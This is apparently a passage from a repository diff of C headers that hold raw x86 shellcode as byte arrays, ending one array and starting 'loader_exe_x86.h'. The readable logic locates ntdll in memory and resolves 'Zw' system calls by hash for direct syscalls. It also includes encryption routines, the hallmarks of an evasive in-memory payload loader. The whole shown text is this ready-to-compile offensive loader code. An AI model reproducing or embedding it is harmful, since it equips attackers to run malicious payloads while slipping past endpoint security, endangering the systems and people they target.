1857 0xf4, 0x01, 0xd0, 0x89, 0x45, 0xd0, 0x8b, 0x45, 0xd0, 0x83, 0xc0, 0x78,
1858 0x89, 0x45, 0xcc, 0x8b, 0x45, 0xcc, 0x8b, 0x00, 0x89, 0x45, 0xc8, 0x83,
1859 0x7d, 0xc8, 0x00, 0x74, 0x40, 0x8b, 0x55, 0xf4, 0x8b, 0x45, 0xc8, 0x01,
1860 0xd0, 0x89, 0x45, 0xf8, 0x8b, 0x45, 0xf8, 0x8b, 0x50, 0x0c, 0x8b, 0x45,
1861 0xf4, 0x01, 0xd0, 0x89, 0x45, 0xc4, 0x8b, 0x45, 0xc4, 0x8b, 0x00, 0x0d,
1862 0x20, 0x20, 0x20, 0x20, 0x3d, 0x6e, 0x74, 0x64, 0x6c, 0x75, 0x19, 0x8b,
1863 0x45, 0xc4, 0x83, 0xc0, 0x04, 0x8b, 0x00, 0x0d, 0x20, 0x20, 0x20, 0x20,
1864 0x3d, 0x6c, 0x2e, 0x64, 0x6c, 0x74, 0x1e, 0xeb, 0x04, 0x90, 0xeb, 0x01,
1865 0x90, 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x89, 0x45, 0xf0, 0x8b, 0x45, 0xf0,
1866 0x8b, 0x40, 0x18, 0x85, 0xc0, 0x0f, 0x85, 0x70, 0xff, 0xff, 0xff, 0xeb,
1867 0x01, 0x90, 0x83, 0x7d, 0xf8, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00,
1868 0x00, 0xe9, 0x03, 0x02, 0x00, 0x00, 0x8b, 0x45, 0xf8, 0x8b, 0x40, 0x18,
1869 0x89, 0x45, 0xec, 0x8b, 0x45, 0xf8, 0x8b, 0x50, 0x1c, 0x8b, 0x45, 0xf4,
1870 0x01, 0xd0, 0x89, 0x45, 0xc0, 0x8b, 0x45, 0xf8, 0x8b, 0x50, 0x20, 0x8b,
1871 0x45, 0xf4, 0x01, 0xd0, 0x89, 0x45, 0xbc, 0x8b, 0x45, 0xf8, 0x8b, 0x50,
1872 0x24, 0x8b, 0x45, 0xf4, 0x01, 0xd0, 0x89, 0x45, 0xb8, 0xc7, 0x45, 0xe8,
1873 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x83, 0xc0, 0x04, 0x89, 0x45,
1874 0xb4, 0x8b, 0x45, 0xec, 0x05, 0xff, 0xff, 0xff, 0x3f, 0x8d, 0x14, 0x85,
1875 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xbc, 0x01, 0xd0, 0x8b, 0x10, 0x8b,
1876 0x45, 0xf4, 0x01, 0xd0, 0x89, 0x45, 0xb0, 0x8b, 0x45, 0xb0, 0x0f, 0xb7,
1877 0x00, 0x66, 0x3d, 0x5a, 0x77, 0x75, 0x60, 0x8b, 0x45, 0xe8, 0x8d, 0x14,
1878 0xc5, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xb4, 0x8d, 0x1c, 0x02, 0x8b,
1879 0x45, 0xb0, 0x89, 0x04, 0x24, 0xe8, 0x32, 0xfe, 0xff, 0xff, 0x89, 0x03,
1880 0x8b, 0x45, 0xec, 0x05, 0xff, 0xff, 0xff, 0x7f, 0x8d, 0x14, 0x00, 0x8b,
1881 0x45, 0xb8, 0x01, 0xd0, 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0, 0x8d, 0x14,
1882 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xc0, 0x01, 0xd0, 0x8b, 0x55,
1883 0xe8, 0x8d, 0x0c, 0xd5, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xb4, 0x01,
1884 0xca, 0x8b, 0x00, 0x89, 0x42, 0x04, 0x83, 0x45, 0xe8, 0x01, 0x81, 0x7d,
1885 0xe8, 0xf4, 0x01, 0x00, 0x00, 0x74, 0x10, 0x83, 0x6d, 0xec, 0x01, 0x83,
1886 0x7d, 0xec, 0x00, 0x0f, 0x85, 0x68, 0xff, 0xff, 0xff, 0xeb, 0x01, 0x90,
1887 0x8b, 0x45, 0x08, 0x8b, 0x55, 0xe8, 0x89, 0x10, 0xc7, 0x45, 0xe4, 0x00,
1888 0x00, 0x00, 0x00, 0xe9, 0xfb, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xe0, 0x00,
1889 0x00, 0x00, 0x00, 0xe9, 0xd7, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xe0, 0x8d,
1890 0x14, 0xc5, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xb4, 0x01, 0xd0, 0x8b,
1891 0x50, 0x04, 0x8b, 0x45, 0xe0, 0x83, 0xc0, 0x01, 0x8d, 0x0c, 0xc5, 0x00,
1892 0x00, 0x00, 0x00, 0x8b, 0x45, 0xb4, 0x01, 0xc8, 0x8b, 0x40, 0x04, 0x39,
1893 0xc2, 0x0f, 0x86, 0xa4, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xe0, 0x8d, 0x14,
1894 0xc5, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xb4, 0x01, 0xd0, 0x8b, 0x00,
1895 0x89, 0x45, 0xa0, 0x8b, 0x45, 0xe0, 0x8d, 0x14, 0xc5, 0x00, 0x00, 0x00,
1896 0x00, 0x8b, 0x45, 0xb4, 0x01, 0xd0, 0x8b, 0x40, 0x04, 0x89, 0x45, 0xa4,
1897 0x8b, 0x45, 0xe0, 0x83, 0xc0, 0x01, 0x8d, 0x14, 0xc5, 0x00, 0x00, 0x00,
1898 0x00, 0x8b, 0x45, 0xb4, 0x01, 0xd0, 0x8b, 0x55, 0xe0, 0x8d, 0x0c, 0xd5,
1899 0x00, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xb4, 0x01, 0xca, 0x8b, 0x00, 0x89,
1900 0x02, 0x8b, 0x45, 0xe0, 0x83, 0xc0, 0x01, 0x8d, 0x14, 0xc5, 0x00, 0x00,
1901 0x00, 0x00, 0x8b, 0x45, 0xb4, 0x01, 0xd0, 0x8b, 0x55, 0xe0, 0x8d, 0x0c,
1902 0xd5, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xb4, 0x01, 0xca, 0x8b, 0x40,
1903 0x04, 0x89, 0x42, 0x04, 0x8b, 0x45, 0xe0, 0x83, 0xc0, 0x01, 0x8d, 0x14,
1904 0xc5, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xb4, 0x01, 0xc2, 0x8b, 0x45,
1905 0xa0, 0x89, 0x02, 0x8b, 0x45, 0xe0, 0x83, 0xc0, 0x01, 0x8d, 0x14, 0xc5,
1906 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xb4, 0x01, 0xc2, 0x8b, 0x45, 0xa4,
1907 0x89, 0x42, 0x04, 0x83, 0x45, 0xe0, 0x01, 0x8b, 0x45, 0x08, 0x8b, 0x00,
1908 0x2b, 0x45, 0xe4, 0x83, 0xe8, 0x01, 0x39, 0x45, 0xe0, 0x0f, 0x82, 0x15,
1909 0xff, 0xff, 0xff, 0x83, 0x45, 0xe4, 0x01, 0x8b, 0x45, 0x08, 0x8b, 0x00,
1910 0x83, 0xe8, 0x01, 0x39, 0x45, 0xe4, 0x0f, 0x82, 0xf4, 0xfe, 0xff, 0xff,
1911 0xb8, 0x01, 0x00, 0x00, 0x00, 0x8b, 0x5d, 0xfc, 0xc9, 0xc3, 0x55, 0x89,
1912 0xe5, 0x83, 0xec, 0x14, 0x83, 0x7d, 0x0c, 0x00, 0x75, 0x07, 0xb8, 0xff,
1913 0xff, 0xff, 0xff, 0xeb, 0x46, 0x8b, 0x45, 0x0c, 0x89, 0x04, 0x24, 0xe8,
1914 0xe2, 0xfc, 0xff, 0xff, 0x85, 0xc0, 0x75, 0x07, 0xb8, 0xff, 0xff, 0xff,
1915 0xff, 0xeb, 0x30, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x18,
1916 0x8b, 0x45, 0x0c, 0x8b, 0x55, 0xfc, 0x8b, 0x44, 0xd0, 0x04, 0x39, 0x45,
1917 0x08, 0x75, 0x05, 0x8b, 0x45, 0xfc, 0xeb, 0x13, 0x83, 0x45, 0xfc, 0x01,
1918 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x39, 0x45, 0xfc, 0x72, 0xde, 0xb8, 0xff,
1919 0xff, 0xff, 0xff, 0xc9, 0xc3, 0x8b, 0x44, 0x24, 0x20, 0x50, 0x68, 0x27,
1920 0x6e, 0x95, 0x32, 0xe8, 0x96, 0xff, 0xff, 0xff, 0x83, 0xc4, 0x08, 0xe8,
1921 0x66, 0x01, 0x00, 0x00, 0xc3, 0x90, 0x0f, 0x0b, 0x8b, 0x44, 0x24, 0x2c,
1922 0x50, 0x68, 0x0d, 0x22, 0x5e, 0x03, 0xe8, 0x7b, 0xff, 0xff, 0xff, 0x83,
1923 0xc4, 0x08, 0xe8, 0x4b, 0x01, 0x00, 0x00, 0xc3, 0x90, 0x0f, 0x0b, 0x8b,
1924 0x44, 0x24, 0x0c, 0x50, 0x68, 0x42, 0xb8, 0xce, 0x9a, 0xe8, 0x60, 0xff,
1925 0xff, 0xff, 0x83, 0xc4, 0x08, 0xe8, 0x30, 0x01, 0x00, 0x00, 0xc3, 0x90,
1926 0x0f, 0x0b, 0x8b, 0x84, 0x24, 0xc1, 0x00, 0x00, 0x00, 0x50, 0x68, 0x53,
1927 0x91, 0x98, 0xf2, 0xe8, 0x42, 0xff, 0xff, 0xff, 0x83, 0xc4, 0x08, 0xe8,
1928 0x12, 0x01, 0x00, 0x00, 0xc3, 0x90, 0x0f, 0x0b, 0x8b, 0x44, 0x24, 0x08,
1929 0x50, 0x68, 0xd1, 0xd6, 0x9d, 0x34, 0xe8, 0x27, 0xff, 0xff, 0xff, 0x83,
1930 0xc4, 0x08, 0xe8, 0xf7, 0x00, 0x00, 0x00, 0xc3, 0x90, 0x0f, 0x0b, 0x8b,
1931 0x44, 0x24, 0x10, 0x50, 0x68, 0x23, 0xe1, 0xbd, 0xe3, 0xe8, 0x0c, 0xff,
1932 0xff, 0xff, 0x83, 0xc4, 0x08, 0xe8, 0xdc, 0x00, 0x00, 0x00, 0xc3, 0x90,
1933 0x0f, 0x0b, 0x8b, 0x44, 0x24, 0x18, 0x50, 0x68, 0x17, 0x15, 0x91, 0x0b,
1934 0xe8, 0xf1, 0xfe, 0xff, 0xff, 0x83, 0xc4, 0x08, 0xe8, 0xc1, 0x00, 0x00,
1935 0x00, 0xc3, 0x90, 0x0f, 0x0b, 0x8b, 0x44, 0x24, 0x0c, 0x50, 0x68, 0x15,
1936 0x42, 0xb7, 0x1c, 0xe8, 0xd6, 0xfe, 0xff, 0xff, 0x83, 0xc4, 0x08, 0xe8,
1937 0xa6, 0x00, 0x00, 0x00, 0xc3, 0x90, 0x0f, 0x0b, 0x8b, 0x44, 0x24, 0x1c,
1938 0x50, 0x68, 0x4b, 0x47, 0xa5, 0x31, 0xe8, 0xbb, 0xfe, 0xff, 0xff, 0x83,
1939 0xc4, 0x08, 0xe8, 0x8b, 0x00, 0x00, 0x00, 0xc3, 0x90, 0x0f, 0x0b, 0x8b,
1940 0x44, 0x24, 0x14, 0x50, 0x68, 0xef, 0x7f, 0x90, 0x87, 0xe8, 0xa0, 0xfe,
1941 0xff, 0xff, 0x83, 0xc4, 0x08, 0xe8, 0x70, 0x00, 0x00, 0x00, 0xc3, 0x90,
1942 0x0f, 0x0b, 0x8b, 0x44, 0x24, 0x30, 0x50, 0x68, 0x2a, 0xfe, 0x9d, 0x24,
1943 0xe8, 0x85, 0xfe, 0xff, 0xff, 0x83, 0xc4, 0x08, 0xe8, 0x55, 0x00, 0x00,
1944 0x00, 0xc3, 0x90, 0x0f, 0x0b, 0x8b, 0x44, 0x24, 0x1c, 0x50, 0x68, 0x39,
1945 0x2b, 0xcf, 0x55, 0xe8, 0x6a, 0xfe, 0xff, 0xff, 0x83, 0xc4, 0x08, 0xe8,
1946 0x3a, 0x00, 0x00, 0x00, 0xc3, 0x90, 0x0f, 0x0b, 0x8b, 0x44, 0x24, 0x30,
1947 0x50, 0x68, 0x93, 0x76, 0x29, 0x34, 0xe8, 0x4f, 0xfe, 0xff, 0xff, 0x83,
1948 0xc4, 0x08, 0xe8, 0x1f, 0x00, 0x00, 0x00, 0xc3, 0x90, 0x0f, 0x0b, 0x8b,
1949 0x44, 0x24, 0x10, 0x50, 0x68, 0xf7, 0xc9, 0xac, 0xff, 0xe8, 0x34, 0xfe,
1950 0xff, 0xff, 0x83, 0xc4, 0x08, 0xe8, 0x04, 0x00, 0x00, 0x00, 0xc3, 0x90,
1951 0x0f, 0x0b, 0x89, 0xe2, 0x0f, 0x34, 0xc3, 0x90, 0x0f, 0x0b, 0x90, 0x90,
1952 0x55, 0x89, 0xe5, 0x83, 0xec, 0x28, 0x8b, 0x45, 0x0c, 0x89, 0x45, 0xd8,
1953 0x8b, 0x45, 0x10, 0x89, 0x45, 0xdc, 0x8b, 0x45, 0xd8, 0x8b, 0x55, 0xdc,
1954 0x89, 0x45, 0xe0, 0x89, 0x55, 0xe4, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00,
1955 0x00, 0xeb, 0x1c, 0x8b, 0x45, 0xfc, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00,
1956 0x00, 0x8b, 0x45, 0x08, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x45, 0xfc, 0x89,
1957 0x54, 0x85, 0xe8, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x03, 0x76,
1958 0xde, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x5e, 0x8b, 0x45,
1959 0xe0, 0xc1, 0xc8, 0x08, 0x89, 0xc2, 0x8b, 0x45, 0xe4, 0x01, 0xc2, 0x8b,
1960 0x45, 0xe8, 0x31, 0xd0, 0x89, 0x45, 0xe0, 0x8b, 0x45, 0xe4, 0xc1, 0xc0,
1961 0x03, 0x89, 0xc2, 0x8b, 0x45, 0xe0, 0x31, 0xd0, 0x89, 0x45, 0xe4, 0x8b,
1962 0x45, 0xf4, 0x89, 0x45, 0xf8, 0x8b, 0x45, 0xec, 0xc1, 0xc8, 0x08, 0x89,
1963 0xc2, 0x8b, 0x45, 0xe8, 0x01, 0xd0, 0x33, 0x45, 0xfc, 0x89, 0x45, 0xf4,
1964 0x8b, 0x45, 0xe8, 0xc1, 0xc0, 0x03, 0x89, 0xc2, 0x8b, 0x45, 0xf4, 0x31,
1965 0xd0, 0x89, 0x45, 0xe8, 0x8b, 0x45, 0xf0, 0x89, 0x45, 0xec, 0x8b, 0x45,
1966 0xf8, 0x89, 0x45, 0xf0, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x1a,
1967 0x76, 0x9c, 0x8b, 0x45, 0xe0, 0x8b, 0x55, 0xe4, 0xc9, 0xc3, 0x55, 0x89,
1968 0xe5, 0x57, 0x56, 0x83, 0xec, 0x50, 0x8b, 0x45, 0x0c, 0x89, 0x45, 0xc0,
1969 0x8b, 0x45, 0x10, 0x89, 0x45, 0xc4, 0x8b, 0x45, 0x08, 0x89, 0x45, 0xe0,
1970 0x8b, 0x45, 0xc0, 0x8b, 0x55, 0xc4, 0x89, 0x45, 0xf0, 0x89, 0x55, 0xf4,
1971 0xc7, 0x45, 0xe8, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xec, 0x00, 0x00,
1972 0x00, 0x00, 0xc7, 0x45, 0xe4, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x0f, 0x01,
1973 0x00, 0x00, 0x8b, 0x55, 0xe0, 0x8b, 0x45, 0xec, 0x01, 0xd0, 0x0f, 0xb6,
1974 0x00, 0x84, 0xc0, 0x74, 0x0a, 0x83, 0x7d, 0xec, 0x40, 0x0f, 0x85, 0x95,
1975 0x00, 0x00, 0x00, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x2b, 0x45, 0xe8, 0x89,
1976 0xc2, 0x8d, 0x4d, 0xd0, 0x8b, 0x45, 0xe8, 0x01, 0xc8, 0x89, 0x54, 0x24,
1977 0x08, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x89, 0x04, 0x24,
1978 0xe8, 0xab, 0xf7, 0xff, 0xff, 0x8d, 0x55, 0xd0, 0x8b, 0x45, 0xe8, 0x01,
1979 0xd0, 0xc6, 0x00, 0x80, 0x83, 0x7d, 0xe8, 0x0b, 0x76, 0x48, 0x8b, 0x45,
1980 0xf0, 0x8b, 0x55, 0xf4, 0x89, 0x44, 0x24, 0x04, 0x89, 0x54, 0x24, 0x08,
1981 0x8d, 0x45, 0xd0, 0x89, 0x04, 0x24, 0xe8, 0x99, 0xfe, 0xff, 0xff, 0x89,
1982 0xc1, 0x33, 0x4d, 0xf0, 0x89, 0xce, 0x89, 0xd0, 0x33, 0x45, 0xf4, 0x89,
1983 0xc7, 0x89, 0x75, 0xf0, 0x89, 0x7d, 0xf4, 0xc7, 0x44, 0x24, 0x08, 0x10,
1984 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x8d,
1985 0x45, 0xd0, 0x89, 0x04, 0x24, 0xe8, 0x52, 0xf7, 0xff, 0xff, 0x8b, 0x45,
1986 0xec, 0xc1, 0xe0, 0x03, 0x89, 0x45, 0xdc, 0xc7, 0x45, 0xe8, 0x10, 0x00,
1987 0x00, 0x00, 0x83, 0x45, 0xe4, 0x01, 0xeb, 0x1f, 0x8b, 0x55, 0xe0, 0x8b,
1988 0x45, 0xec, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x89, 0xc2, 0x8d, 0x4d, 0xd0,
1989 0x8b, 0x45, 0xe8, 0x01, 0xc8, 0x88, 0x10, 0x83, 0x45, 0xe8, 0x01, 0x83,
1990 0x45, 0xec, 0x01, 0x83, 0x7d, 0xe8, 0x10, 0x75, 0x3c, 0x8b, 0x45, 0xf0,
1991 0x8b, 0x55, 0xf4, 0x89, 0x44, 0x24, 0x04, 0x89, 0x54, 0x24, 0x08, 0x8d,
1992 0x45, 0xd0, 0x89, 0x04, 0x24, 0xe8, 0x16, 0xfe, 0xff, 0xff, 0x89, 0xc1,
1993 0x33, 0x4d, 0xf0, 0x89, 0x4d, 0xb8, 0x89, 0xd0, 0x33, 0x45, 0xf4, 0x89,
1994 0x45, 0xbc, 0x8b, 0x45, 0xb8, 0x8b, 0x55, 0xbc, 0x89, 0x45, 0xf0, 0x89,
1995 0x55, 0xf4, 0xc7, 0x45, 0xe8, 0x00, 0x00, 0x00, 0x00, 0x83, 0x7d, 0xe4,
1996 0x00, 0x0f, 0x84, 0xe7, 0xfe, 0xff, 0xff, 0x8b, 0x45, 0xf0, 0x8b, 0x55,
1997 0xf4, 0x83, 0xc4, 0x50, 0x5e, 0x5f, 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0x53,
1998 0x83, 0xec, 0x10, 0x8b, 0x45, 0x0c, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0x08,
1999 0x89, 0x45, 0xf0, 0xc7, 0x45, 0xf8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x39,
2000 0x8b, 0x45, 0xf8, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45,
2001 0xf4, 0x01, 0xd0, 0x8b, 0x08, 0x8b, 0x45, 0xf8, 0x8d, 0x14, 0x85, 0x00,
2002 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf0, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x45,
2003 0xf8, 0x8d, 0x1c, 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf4, 0x01,
2004 0xd8, 0x31, 0xca, 0x89, 0x10, 0x83, 0x45, 0xf8, 0x01, 0x83, 0x7d, 0xf8,
2005 0x03, 0x76, 0xc1, 0xc7, 0x45, 0xf8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xee,
2006 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf4, 0x8b, 0x10, 0x8b, 0x45, 0xf4, 0x83,
2007 0xc0, 0x04, 0x8b, 0x00, 0x01, 0xc2, 0x8b, 0x45, 0xf4, 0x89, 0x10, 0x8b,
2008 0x45, 0xf4, 0x83, 0xc0, 0x04, 0x8b, 0x00, 0xc1, 0xc0, 0x05, 0x89, 0xc1,
2009 0x8b, 0x45, 0xf4, 0x8b, 0x10, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x04, 0x31,
2010 0xca, 0x89, 0x10, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x08, 0x8b, 0x08, 0x8b,
2011 0x45, 0xf4, 0x83, 0xc0, 0x0c, 0x8b, 0x10, 0x8b, 0x45, 0xf4, 0x83, 0xc0,
2012 0x08, 0x01, 0xca, 0x89, 0x10, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x0c, 0x8b,
2013 0x00, 0xc1, 0xc0, 0x08, 0x89, 0xc1, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x08,
2014 0x8b, 0x10, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x0c, 0x31, 0xca, 0x89, 0x10,
2015 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x08, 0x8b, 0x08, 0x8b, 0x45, 0xf4, 0x83,
2016 0xc0, 0x04, 0x8b, 0x10, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x08, 0x01, 0xca,
2017 0x89, 0x10, 0x8b, 0x45, 0xf4, 0x8b, 0x00, 0xc1, 0xc0, 0x10, 0x89, 0xc2,
2018 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x0c, 0x8b, 0x00, 0x01, 0xc2, 0x8b, 0x45,
2019 0xf4, 0x89, 0x10, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x0c, 0x8b, 0x00, 0xc1,
2020 0xc0, 0x0d, 0x89, 0xc1, 0x8b, 0x45, 0xf4, 0x8b, 0x10, 0x8b, 0x45, 0xf4,
2021 0x83, 0xc0, 0x0c, 0x31, 0xca, 0x89, 0x10, 0x8b, 0x45, 0xf4, 0x83, 0xc0,
2022 0x04, 0x8b, 0x00, 0xc1, 0xc0, 0x07, 0x89, 0xc1, 0x8b, 0x45, 0xf4, 0x83,
2023 0xc0, 0x08, 0x8b, 0x10, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x04, 0x31, 0xca,
2024 0x89, 0x10, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x08, 0x8b, 0x10, 0x8b, 0x45,
2025 0xf4, 0x83, 0xc0, 0x08, 0xc1, 0xc2, 0x10, 0x89, 0x10, 0x83, 0x45, 0xf8,
2026 0x01, 0x83, 0x7d, 0xf8, 0x0f, 0x0f, 0x86, 0x08, 0xff, 0xff, 0xff, 0xc7,
2027 0x45, 0xf8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x39, 0x8b, 0x45, 0xf8, 0x8d,
2028 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf4, 0x01, 0xd0, 0x8b,
2029 0x08, 0x8b, 0x45, 0xf8, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b,
2030 0x45, 0xf0, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x45, 0xf8, 0x8d, 0x1c, 0x85,
2031 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf4, 0x01, 0xd8, 0x31, 0xca, 0x89,
2032 0x10, 0x83, 0x45, 0xf8, 0x01, 0x83, 0x7d, 0xf8, 0x03, 0x76, 0xc1, 0x90,
2033 0x90, 0x8b, 0x5d, 0xfc, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x53, 0x83, 0xec,
2034 0x28, 0x8b, 0x45, 0x10, 0x89, 0x45, 0xf8, 0x8b, 0x45, 0x0c, 0x89, 0x45,
2035 0xf0, 0xe9, 0xbd, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00,
2036 0x00, 0xeb, 0x19, 0x8b, 0x55, 0xf0, 0x8b, 0x45, 0xf4, 0x01, 0xd0, 0x0f,
2037 0xb6, 0x00, 0x8d, 0x4d, 0xdc, 0x8b, 0x55, 0xf4, 0x01, 0xca, 0x88, 0x02,
2038 0x83, 0x45, 0xf4, 0x01, 0x83, 0x7d, 0xf4, 0x0f, 0x76, 0xe1, 0x8d, 0x45,
2039 0xdc, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8,
2040 0x00, 0xfe, 0xff, 0xff, 0x8b, 0x45, 0x14, 0xba, 0x10, 0x00, 0x00, 0x00,
2041 0x39, 0xd0, 0x0f, 0x47, 0xc2, 0x89, 0x45, 0xec, 0xc7, 0x45, 0xf4, 0x00,
2042 0x00, 0x00, 0x00, 0xeb, 0x26, 0x8b, 0x55, 0xf8, 0x8b, 0x45, 0xf4, 0x01,
2043 0xd0, 0x0f, 0xb6, 0x08, 0x8d, 0x55, 0xdc, 0x8b, 0x45, 0xf4, 0x01, 0xd0,
2044 0x0f, 0xb6, 0x10, 0x8b, 0x5d, 0xf8, 0x8b, 0x45, 0xf4, 0x01, 0xd8, 0x31,
2045 0xca, 0x88, 0x10, 0x83, 0x45, 0xf4, 0x01, 0x8b, 0x45, 0xf4, 0x3b, 0x45,
2046 0xec, 0x72, 0xd2, 0x8b, 0x45, 0xec, 0x29, 0x45, 0x14, 0x8b, 0x45, 0xec,
2047 0x01, 0x45, 0xf8, 0xc7, 0x45, 0xf4, 0x10, 0x00, 0x00, 0x00, 0xeb, 0x20,
2048 0x8b, 0x45, 0xf4, 0x8d, 0x50, 0xff, 0x8b, 0x45, 0xf0, 0x01, 0xd0, 0x0f,
2049 0xb6, 0x10, 0x83, 0xc2, 0x01, 0x88, 0x10, 0x0f, 0xb6, 0x00, 0x84, 0xc0,
2050 0x74, 0x02, 0xeb, 0x0b, 0x83, 0x6d, 0xf4, 0x01, 0x8b, 0x45, 0xf4, 0x85,
2051 0xc0, 0x7f, 0xd9, 0x83, 0x7d, 0x14, 0x00, 0x0f, 0x85, 0x39, 0xff, 0xff,
2052 0xff, 0x90, 0x90, 0x8b, 0x5d, 0xfc, 0xc9, 0xc3, 0xff, 0xff, 0xff, 0xff,
2053 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00};
2054
+2052
-0
loader_exe_x86.h less more
0
1 unsigned char LOADER_EXE_X86[] = {
2 0x55, 0x89, 0xe5, 0x56, 0x53, 0x81, 0xec, 0x10, 0x03, 0x00, 0x00, 0xc7,
3 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x90, 0x0c,
4 0x02, 0x00, 0x00, 0x8b, 0x80, 0x08, 0x02, 0x00, 0x00, 0x89, 0xc6, 0x83,
5 0xf6, 0x00, 0x89, 0xf1, 0x89, 0xd0, 0x80, 0xf4, 0x00, 0x89, 0xc3, 0x89,
6 0xd8, 0x09, 0xc8, 0x85, 0xc0, 0x0f, 0x84, 0x54, 0x01, 0x00, 0x00, 0x8b,
7 0x45, 0x08, 0x8b, 0x50, 0x74, 0x8b, 0x40, 0x70, 0x89, 0x45, 0xe8, 0x89,
8 0x55, 0xec, 0x8b, 0x45, 0x08, 0x8b, 0x50, 0x2c, 0x8b, 0x40, 0x28, 0x89,
9 0x44, 0x24, 0x0c, 0x89, 0x54, 0x24, 0x10, 0x8b, 0x45, 0xe8, 0x8b, 0x55,
10 0xec, 0x89, 0x44, 0x24, 0x04, 0x89, 0x54, 0x24, 0x08, 0x8b, 0x45, 0x08,
11 0x89, 0x04, 0x24, 0xe8, 0xb2, 0x11, 0x00, 0x00, 0x89, 0x45, 0xe4, 0x83,
12 0x7d, 0xe4, 0x00, 0x0f, 0x84, 0x98, 0x00, 0x00, 0x00, 0xe8, 0x8e, 0x50,
13 0x00, 0x00, 0xba, 0xa4, 0x11, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00,
14 0x29, 0xca, 0x01, 0xd0, 0x89, 0xc2, 0xc7, 0x44, 0x24, 0x14, 0x00, 0x00,
15 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45,
16 0x08, 0x89, 0x44, 0x24, 0x0c, 0x89, 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24,
17 0x04, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x04, 0x24, 0x00, 0x00, 0x00, 0x00,
18 0x8b, 0x45, 0xe4, 0xff, 0xd0, 0x83, 0xec, 0x18, 0x89, 0x45, 0xf4, 0x8b,
19 0x45, 0x08, 0x8b, 0x90, 0x8c, 0x00, 0x00, 0x00, 0x8b, 0x80, 0x88, 0x00,
20 0x00, 0x00, 0x89, 0x45, 0xe8, 0x89, 0x55, 0xec, 0x8b, 0x45, 0x08, 0x8b,
21 0x50, 0x2c, 0x8b, 0x40, 0x28, 0x89, 0x44, 0x24, 0x0c, 0x89, 0x54, 0x24,
22 0x10, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xec, 0x89, 0x44, 0x24, 0x04, 0x89,
23 0x54, 0x24, 0x08, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x1c, 0x11,
24 0x00, 0x00, 0x89, 0x45, 0xe0, 0x83, 0x7d, 0xdc, 0x00, 0x0f, 0x84, 0x83,
